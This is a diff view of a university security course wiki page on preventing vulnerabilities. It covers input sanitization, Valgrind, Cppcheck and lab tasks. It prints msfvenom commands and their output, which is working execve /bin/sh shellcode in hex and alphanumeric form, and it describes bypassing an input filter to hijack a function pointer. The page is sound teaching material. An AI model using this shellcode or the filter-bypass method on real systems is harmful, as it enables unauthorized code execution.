Security Summer School

User Tools

Site Tools

session:extra:preventing-vulnerabilities

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision 		Previous revision
session:extra:preventing-vulnerabilities [2016/06/20 16:14]
Razvan Deaconescu [0x0D. Detecting Vulnerabilities] 		session:extra:preventing-vulnerabilities [2020/07/19 12:49] (current)
Line 1: Line 1:
-= 0x0D. Preventing Vulnerabilities+====== 0x0D. Preventing Vulnerabilities ======
  
-== Slides+===== Slides =====
  
 <note warning> <note warning>
Line 7: Line 7:
 </note> </note>
  
-== Tutorials +===== Tutorials  =====
  
  
-=== Sanitizing Input+==== Sanitizing Input ====
  
 Invalid input may cause a program to crash. Input may also consists of content that is able to exploit vulnerabilities in programs; among the most famous forms of input that causes exploits is [[https://www.owasp.org/index.php/SQL_Injection|SQL injection]]. If the developer won't check for input then an SQL select query may show private information to the attacker. One needs to validate input and make sure it follows a valid format. Invalid input may cause a program to crash. Input may also consists of content that is able to exploit vulnerabilities in programs; among the most famous forms of input that causes exploits is [[https://www.owasp.org/index.php/SQL_Injection|SQL injection]]. If the developer won't check for input then an SQL select query may show private information to the attacker. One needs to validate input and make sure it follows a valid format.
Line 18: Line 18:
 Consider the case of a web application that receives HTTP queries. It may be that a form requires the user to input an alphanumeric character. The user, however, enters an binary shellcode string and then uses it to exploit a vulnerability in the web application and launch a shell or run a different command. A careful programmer would sanitize input and make sure the username is alphanumeric. Though it is possible to bypass this and use an [[http://www.blackhatlibrary.net/Shellcode/Alphanumeric|alphanumeric shellcode]]. Consider the case of a web application that receives HTTP queries. It may be that a form requires the user to input an alphanumeric character. The user, however, enters an binary shellcode string and then uses it to exploit a vulnerability in the web application and launch a shell or run a different command. A careful programmer would sanitize input and make sure the username is alphanumeric. Though it is possible to bypass this and use an [[http://www.blackhatlibrary.net/Shellcode/Alphanumeric|alphanumeric shellcode]].
  
-==== Alphanumeric Shellcode+=== Alphanumeric Shellcode ===
  
 An alphanumeric shellcode is a shellcode that consists solely of alphanumeric characters that may bypass a sanitizing method on a given string. Alphanumeric shellcodes have larger size due to the fact that they are only able to use certain instructions, such as doing increments to get to a certain value in a register. An alphanumeric shellcode is a shellcode that consists solely of alphanumeric characters that may bypass a sanitizing method on a given string. Alphanumeric shellcodes have larger size due to the fact that they are only able to use certain instructions, such as doing increments to get to a certain value in a register.
  
-The Metasploit framework is among the simplest ways of obtaining shellcodes and alphanumeric shellcodes. In order to install Metasploit one would use the instructions [[http://www.linuxx.eu/2014/01/install-metasploit-on-debian.html|here]] (on Debian-based systems) or [[https://wiki.archlinux.org/index.php/Metasploit_Framework|here]] (Arch).+The Metasploit framework is among the simplest ways of obtaining shellcodes and alphanumeric shellcodes. Metasploit is already installed on your Kali machines. However, if manual installation is needed, one would use the instructions [[http://www.linuxx.eu/2014/01/install-metasploit-on-debian.html|here]] (on Debian-based systems) or [[https://wiki.archlinux.org/index.php/Metasploit_Framework|here]] (Arch). 
  
 For example, in order to get an alphanumeric shellcode we would use [[https://www.offensive-security.com/metasploit-unleashed/msfvenom/|msfvenom]] Metasploit command. For example, in order to get an alphanumeric shellcode we would use [[https://www.offensive-security.com/metasploit-unleashed/msfvenom/|msfvenom]] Metasploit command.
  
 The use of the ''-h'' option provides a list of options for the command:<code> The use of the ''-h'' option provides a list of options for the command:<code>
-student@sss-vm:/opt/metasploit-framework.git$ ./msfvenom -h+student@sss-vm:/opt/metasploit-framework.git$ msfvenom -h
 MsfVenom - a Metasploit standalone payload generator. MsfVenom - a Metasploit standalone payload generator.
 Also a replacement for msfpayload and msfencode. Also a replacement for msfpayload and msfencode.
Line 56: Line 56:
  
 In order to list available payloads one would use the command<code> In order to list available payloads one would use the command<code>
-student@sss-vm:/opt/metasploit-framework.git$ ./msfvenom -l payloads | head+student@sss-vm:/opt/metasploit-framework.git$ msfvenom -l payloads | head
  
 Framework Payloads (428 total) Framework Payloads (428 total)
Line 70: Line 70:
  
 The complete command for creating an alphanumeric shellcode that spawns a shell:<code> The complete command for creating an alphanumeric shellcode that spawns a shell:<code>
-student@sss-vm:/opt/metasploit-framework.git$ ./msfvenom -p linux/x86/exec CMD=/bin/sh -f python+student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -f python
 No platform was selected, choosing Msf::Module::Platform::Linux from the payload No platform was selected, choosing Msf::Module::Platform::Linux from the payload
 No Arch selected, selecting Arch: x86 from the payload No Arch selected, selecting Arch: x86 from the payload
Line 81: Line 81:
 buf += "\x89\xe1\xcd\x80" buf += "\x89\xe1\xcd\x80"
  
-student@sss-vm:/opt/metasploit-framework.git$ ./msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python+student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python
 No platform was selected, choosing Msf::Module::Platform::Linux from the payload No platform was selected, choosing Msf::Module::Platform::Linux from the payload
 No Arch selected, selecting Arch: x86 from the payload No Arch selected, selecting Arch: x86 from the payload
Line 124: Line 124:
  
 This is because these instructions need a way of computing the current position of the shellcode. This may be solved by making a register (such as ECX for example) point to the beginning of the shellcode buffer. If that is possible in the program, then the shellcode may be instructed to fetch its address from that point:<code> This is because these instructions need a way of computing the current position of the shellcode. This may be solved by making a register (such as ECX for example) point to the beginning of the shellcode buffer. If that is possible in the program, then the shellcode may be instructed to fetch its address from that point:<code>
-student@sss-vm:/opt/metasploit-framework.git$ ./msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python BufferRegister=ECX+student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python BufferRegister=ECX
 No platform was selected, choosing Msf::Module::Platform::Linux from the payload No platform was selected, choosing Msf::Module::Platform::Linux from the payload
 No Arch selected, selecting Arch: x86 from the payload No Arch selected, selecting Arch: x86 from the payload
Line 160: Line 160:
 IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIazTKV8z9sb3VPh6MCSk9JGE8TobSqxGpPhdosRrI2NnikSaBKXTHWps0C0vO52pipnDoCCphgpRw63LIkQZmOpAA IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIazTKV8z9sb3VPh6MCSk9JGE8TobSqxGpPhdosRrI2NnikSaBKXTHWps0C0vO52pipnDoCCphgpRw63LIkQZmOpAA
 </code> </code>
-=== Detecting memory errors with Valgrind+==== Detecting memory errors with Valgrind ====
  
 Valgrind is a multipurpose code profiling and memory debugging tool for Linux. It allows you to run your program in Valgrind's own environment that monitors memory usage such as calls to malloc and free (or new and delete in C++). If you use uninitialized memory, write off the end of an array, or forget to free a pointer, Valgrind can detect it. Valgrind is a multipurpose code profiling and memory debugging tool for Linux. It allows you to run your program in Valgrind's own environment that monitors memory usage such as calls to malloc and free (or new and delete in C++). If you use uninitialized memory, write off the end of an array, or forget to free a pointer, Valgrind can detect it.
  
-==== Running Valgrind memcheck+=== Running Valgrind memcheck ===
  
 <code bash> <code bash>
Line 174: Line 174:
 </code> </code>
  
-==== Interpreting errors +=== Interpreting errors  ===
  
 Memcheck issues a range of error messages. This section presents a quick summary of what error messages mean. The precise behaviour of the error-checking machinery is described [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|here]] Memcheck issues a range of error messages. This section presents a quick summary of what error messages mean. The precise behaviour of the error-checking machinery is described [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|here]]
-===== Illegal read / Illegal write errors+== Illegal read / Illegal write errors ==
  
 Take the following error: Take the following error:
Line 196: Line 196:
 Note that Memcheck only tells you that your program is about to access memory at an illegal address. It can't stop the access from happening. So, if your program makes an access which normally would result in a segmentation fault, you program will still suffer the same fate -- but you will get a message from Memcheck immediately prior to this. In this particular example, reading junk on the stack is non-fatal, and the program stays alive. Note that Memcheck only tells you that your program is about to access memory at an illegal address. It can't stop the access from happening. So, if your program makes an access which normally would result in a segmentation fault, you program will still suffer the same fate -- but you will get a message from Memcheck immediately prior to this. In this particular example, reading junk on the stack is non-fatal, and the program stays alive.
  
-===== Use of uninitialised values+== Use of uninitialised values ==
  
 <code bash> <code bash>
Line 221: Line 221:
  * The contents of heap blocks (allocated with malloc, new, or a similar function) before you (or a constructor) write something there.  * The contents of heap blocks (allocated with malloc, new, or a similar function) before you (or a constructor) write something there.
  
-===== Use of uninitialised or unaddressable values in system calls+== Use of uninitialised or unaddressable values in system calls ==
  
 Memcheck checks all parameters to system calls: Memcheck checks all parameters to system calls:
Line 259: Line 259:
 The program has (a) written uninitialised junk from the heap block to the standard output, and (b) passed an uninitialised value to exit. Note that the first error refers to the memory pointed to by buf (not buf itself), but the second error refers directly to exit's argument arr2[0]. The program has (a) written uninitialised junk from the heap block to the standard output, and (b) passed an uninitialised value to exit. Note that the first error refers to the memory pointed to by buf (not buf itself), but the second error refers directly to exit's argument arr2[0].
  
-=====  Illegal frees+==  Illegal frees ==
  
 <code bash> <code bash>
Line 272: Line 272:
 Memcheck keeps track of the blocks allocated by your program with malloc/new, so it can know exactly whether or not the argument to free/delete is legitimate or not. Here, this test program has freed the same block twice. As with the illegal read/write errors, Memcheck attempts to make sense of the address freed. If, as here, the address is one which has previously been freed, you wil be told that -- making duplicate frees of the same block easy to spot. You will also get this message if you try to free a pointer that doesn't point to the start of a heap block. Memcheck keeps track of the blocks allocated by your program with malloc/new, so it can know exactly whether or not the argument to free/delete is legitimate or not. Here, this test program has freed the same block twice. As with the illegal read/write errors, Memcheck attempts to make sense of the address freed. If, as here, the address is one which has previously been freed, you wil be told that -- making duplicate frees of the same block easy to spot. You will also get this message if you try to free a pointer that doesn't point to the start of a heap block.
  
-===== When a heap block is freed with an inappropriate deallocation function+== When a heap block is freed with an inappropriate deallocation function ==
 In the following example, a block allocated with new[] has wrongly been deallocated with free: In the following example, a block allocated with new[] has wrongly been deallocated with free:
  
Line 298: Line 298:
 The reason behind the requirement is as follows. In some C++ implementations, delete[] must be used for objects allocated by new[] because the compiler stores the size of the array and the pointer-to-member to the destructor of the array's content just before the pointer actually returned. delete doesn't account for this and will get confused, possibly corrupting the heap. The reason behind the requirement is as follows. In some C++ implementations, delete[] must be used for objects allocated by new[] because the compiler stores the size of the array and the pointer-to-member to the destructor of the array's content just before the pointer actually returned. delete doesn't account for this and will get confused, possibly corrupting the heap.
  
-===== Overlapping source and destination blocks+== Overlapping source and destination blocks ==
 The following C library functions copy some data from one memory block to another (or something similar): memcpy, strcpy, strncpy, strcat, strncat. The blocks pointed to by their src and dst pointers aren't allowed to overlap. The POSIX standards have wording along the lines "If copying takes place between objects that overlap, the behavior is undefined." Therefore, Memcheck checks for this. The following C library functions copy some data from one memory block to another (or something similar): memcpy, strcpy, strncpy, strcat, strncat. The blocks pointed to by their src and dst pointers aren't allowed to overlap. The POSIX standards have wording along the lines "If copying takes place between objects that overlap, the behavior is undefined." Therefore, Memcheck checks for this.
  
Line 309: Line 309:
 You don't want the two blocks to overlap because one of them could get partially overwritten by the copying. You don't want the two blocks to overlap because one of them could get partially overwritten by the copying.
  
-===== Memory leak detection+== Memory leak detection ==
  
 Memcheck keeps track of all heap blocks issued in response to calls to malloc/new et al. So when the program exits, it knows which blocks have not been freed. Memcheck keeps track of all heap blocks issued in response to calls to malloc/new et al. So when the program exits, it knows which blocks have not been freed.
Line 412: Line 412:
 The first message describes a simple case of a single 8 byte block that has been definitely lost. The second case mentions another 8 byte block that has been definitely lost; the difference is that a further 80 bytes in other blocks are indirectly lost because of this lost block. The loss records are not presented in any notable order, so the loss record numbers aren't particularly meaningful. The loss record numbers can be used in the Valgrind gdbserver to list the addresses of the leaked blocks and/or give more details about how a block is still reachable. The first message describes a simple case of a single 8 byte block that has been definitely lost. The second case mentions another 8 byte block that has been definitely lost; the difference is that a further 80 bytes in other blocks are indirectly lost because of this lost block. The loss records are not presented in any notable order, so the loss record numbers aren't particularly meaningful. The loss record numbers can be used in the Valgrind gdbserver to list the addresses of the leaked blocks and/or give more details about how a block is still reachable.
  
-=== Static Analysis+==== Static Analysis ====
  
 Static analysis can be done using a variety of tools, ranging from ''lint''-like analyzers to software suites that attempt to do full semantic analysis on the code. Wikipedia gives a comprehensive [[https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis|list of static code analysis tools]] for various programming languages. One such useful tool is [[http://cppcheck.sourceforge.net/|Cppcheck]], which has been used to discover a [[http://tech.slashdot.org/story/14/01/08/1421235/23-year-old-x11-server-security-vulnerability-discovered|23-year-old vulnerability]] in the X11 server. Static analysis can be done using a variety of tools, ranging from ''lint''-like analyzers to software suites that attempt to do full semantic analysis on the code. Wikipedia gives a comprehensive [[https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis|list of static code analysis tools]] for various programming languages. One such useful tool is [[http://cppcheck.sourceforge.net/|Cppcheck]], which has been used to discover a [[http://tech.slashdot.org/story/14/01/08/1421235/23-year-old-x11-server-security-vulnerability-discovered|23-year-old vulnerability]] in the X11 server.
Line 437: Line 437:
 </code> </code>
  
-<note>The ''cppcheck'' Debian package is outdated and lacks many featuresso you'll have to download the latest Cppcheck sources from [[http://sourceforge.net/projects/cppcheck/files/cppcheck/1.63/|Sourceforge]] and compile them by simply running ''make''.</note>+<note>The ''cppcheck'' Kali Linux currently contains Cppcheck version 1.74; alternatively, you can download the latest Cppcheck sources from [[http://sourceforge.net/projects/cppcheck/files/cppcheck|Sourceforge]] and compile them by simply running ''make''.</note>
  
 Another well know static analysis tool, used for detecting bugs and possible vulnerabilities is [[http://www.coverity.com/|Coverity]]. Open source projects may be checked using [[https://scan.coverity.com/|Coverity Scan]] for free; all one needs to do is create an account. Coverity Scan is integrated with GitHub. Another well know static analysis tool, used for detecting bugs and possible vulnerabilities is [[http://www.coverity.com/|Coverity]]. Open source projects may be checked using [[https://scan.coverity.com/|Coverity Scan]] for free; all one needs to do is create an account. Coverity Scan is integrated with GitHub.
-== Tasks+===== Tasks =====
  
-=== Valgrind warm-up exercise+==== Valgrind warm-up exercise ====
  
 Download the following {{:session:session13_task1.tgz|archive}}. Compile the C source file contained within with gcc and use Valgrind to detect the possible memory errors. After detecting the errors, try to find the incorrect lines of code causing them and fix the problems.  Download the following {{:session:session13_task1.tgz|archive}}. Compile the C source file contained within with gcc and use Valgrind to detect the possible memory errors. After detecting the errors, try to find the incorrect lines of code causing them and fix the problems. 
  
-=== Hunting memory errors in Nginx+==== Hunting memory errors in Nginx ====
  
 Download the following {{:session:nginx-1.7.3-sss.tgz|archive}} containing a modified version of the Nginx web server. Compile the nginx web server and install it somewhere local<code> Download the following {{:session:nginx-1.7.3-sss.tgz|archive}} containing a modified version of the Nginx web server. Compile the nginx web server and install it somewhere local<code>
Line 471: Line 471:
 As done in the previous exercise, try to pinpoint the memory problem using Valgrind and then resolve it. As done in the previous exercise, try to pinpoint the memory problem using Valgrind and then resolve it.
 <note info>You may need to delve in a bit into the nginx code and understand how it's managing memory before attempting a fix </note> <note info>You may need to delve in a bit into the nginx code and understand how it's managing memory before attempting a fix </note>
-=== Shellcode, Sanitizing and Alphanumeric Shellcode+==== Shellcode, Sanitizing and Alphanumeric Shellcode ====
  
 Use {{:session:shellcode-validation.zip|this archive}} for this task. Use ''make'' to create the ''show-banner-message'' executable file. In this task, you should disable ASLR:<code> Use {{:session:shellcode-validation.zip|this archive}} for this task. Use ''make'' to create the ''show-banner-message'' executable file. In this task, you should disable ASLR:<code>
Line 488: Line 488:
 The shellcode will be passed as a byte array as an argument to the program. It will be stored in the ''message'' local variable. The address of the ''message'' local variable will be used as the address to overwrite the ''print_fn'' global function pointer, as stated above. The shellcode will be passed as a byte array as an argument to the program. It will be stored in the ''message'' local variable. The address of the ''message'' local variable will be used as the address to overwrite the ''print_fn'' global function pointer, as stated above.
 </note> </note>
-=== Static Analysis with Cppcheck+==== Static Analysis with Cppcheck ====
  
 Use {{:session:checkme.zip|this archive}} for the task. Use ''make'' to create the ''checkme'' executable file. Use {{:session:checkme.zip|this archive}} for the task. Use ''make'' to create the ''checkme'' executable file.
Line 494: Line 494:
 Look through the source file. It consists of a function ''my_tokenize'', which is called from the main program multiple times. Run a basic ''cppcheck'' check on it. Look through the source file. It consists of a function ''my_tokenize'', which is called from the main program multiple times. Run a basic ''cppcheck'' check on it.
  
-Write a library configuration file that specifies that ''my_tokenize'''s first argument must be non-null and its second argument must have values between ''0'' and ''1024''. Use the [[http://www.cs.kent.edu/~rothstei/fall_14/sec_notes/manual.pdf|manual]] as a reference (''section 7: Library configuration'').+Write a library configuration file that specifies that ''my_tokenize'''s first argument must be non-null and its second argument must have values between ''0'' and ''1024''. Use the [[http://cppcheck.sourceforge.net/manual.pdf|manual]] as a reference (''section 7: Library configuration'').
  
 Run ''cppcheck'' again and tell it to load the newly created library file. Run ''cppcheck'' again and tell it to load the newly created library file.
  
-<note tip> 
-Pentru range construcția corectă este<code> 
-<valid>0:1024</valid> 
-</code> 
-Deși în manual este specificat ca<code> 
-<valid>0-1024</valid> 
-</code>(adică cu ''-'' (minus) în loc de '':'' (două puncte)) 
-</note> 
  
 === Extra: io.smashthestack.org === === Extra: io.smashthestack.org ===
  
 Go through the first 6 levels of the [[http://io.smashthestack.org/|io.smashthestack.org wargame]]. If you fill up to it, solve the ''_alt'' versions of the challenges as well. Go through the first 6 levels of the [[http://io.smashthestack.org/|io.smashthestack.org wargame]]. If you fill up to it, solve the ''_alt'' versions of the challenges as well.
-== References+===== References =====
  * [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|Details of Memcheck's checking machinery]]  * [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|Details of Memcheck's checking machinery]]
session/extra/preventing-vulnerabilities.1466428469.txt.gz · Last modified: 2016/06/20 16:14 by Razvan Deaconescu

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki